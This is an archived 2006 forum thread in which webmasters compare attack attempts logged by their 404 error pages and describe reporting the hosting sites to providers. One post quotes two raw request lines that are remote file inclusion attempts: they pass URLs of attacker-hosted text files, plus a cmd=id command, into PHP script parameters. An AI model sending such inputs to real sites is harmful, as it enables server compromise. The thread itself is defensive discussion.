AllMyGuests signin.php 404 error pages

Posted: Tue Feb 07, 2006 11:31 am

I´m not using AllMyGuests anymore, but I noticed since I installed the 404 error page with mailfunction a lot of mails like this with IP´s from Brasil and some other countries too:

Quote:

------------------
201.58.68.105 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.portodemoz.pa.gov.br/su.txt?bug0?

User Agent =
------------------

201.9.158.203 tried to load //include/write.php?dir=http://www.webzenxd.kit.net/tool25.txt?&cmd=id

User Agent =

Does this means someone is running that "D" tool or is this more automatically ? Of course I can ban Brasil completly but it isn´t the solution. How to stop this ?

Sells PC To Pay For Divorce Joined: Posts: 5661

indeed my dear susann....im sure your glad now having my 404 huh... Smile

yes they are looking for ways to hack the place..
i maild the brazilian owners of ...www.webzenxd.kit...etc.... 2 days ago..and as you visit it you see they finaly took the site offline..... Razz

so it is usefull to mail providers and pulling websites down,even in brasil..

Posted: Tue Feb 07, 2006 3:43 pm

Thanks Hitwalker, Smile

Yes, the 404 pages are helpful because you are good informed in time.I get my logfiles allways one day later.

Because of the cmd and AllMyGuests I googeled and what me shocked is that this d tool can be found on several sites.

Posted: Tue Feb 07, 2006 3:50 pm

yes i know....a lot were usualy hosted by yahoo (geocities) ,but they respond faster lately....
yesterday i got a big thank you from an american who had a hacked area on his site he didnt know of..
they uploaded the same stuff that was on the brasil website.
he was gratefull for the warning.....
point is,i didnt had to do that.
if people would do it more often then there would be less addresses to abuse.

Posted: Tue Feb 07, 2006 4:36 pm

Quote:

if people would do it more often then there would be less addresses to abuse.

Exact that´s the problem.The most people are to lazy or they hesitate to do it because they really don´t know what´s going on.

Posted: Tue Feb 07, 2006 4:54 pm

I had another one susann,this one was hosted at 100free.
I wrote them ...
(names etc ...are taken out)
Contact Name: hitwalker

Support Issue: please remove the following account.

They just replied with:

This site has been removed from our hosting services for violations of our
TOS (Terms of Service). Additionally, all sites associated with the email
address used to sign up for hosting have been removed. Thank you for
bringing this to our attention.

Nice huh..... killing me

Posted: Tue Feb 07, 2006 8:22 pm

Nice. It's as simple as that Smile

Posted: Fri Feb 10, 2006 9:37 pm

Quote:

m sure your glad now having my 404 huh

Well, it´s a never ending story with the signin.php. There must be any reason why I received at the moment a lot of this kind of mails.

Posted: Fri Feb 10, 2006 10:28 pm

yeah i get them to....but its getting less now..also getting some profile.php....lol
but as you saw by now susann how busy they are....
but i believe most of them are automatic scripts that pull website url like ours from scripts....then the let a script run with different proxies.
ive seen that a lot by now,same url over and over like 4 or 5 times within 1 minutes with 3 or 4 different ip's.

Posted: Sat Feb 11, 2006 5:45 am

Well, I visit some hackers site after the first email and I thought first this could be the reason. But I found about the "D" tool 2 interesting articles one is from isc.sans.org "We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically."

Posted: Sat Feb 11, 2006 6:27 am

well thats all they do...
most people dont even know whats going on on their server..
and we have both ways covered now as i like to believe...
or we get a wanna be hacker attack and sentinel kills him on site or they call for a page i dont have and i get the 404 and i kill them personaly Twisted Evil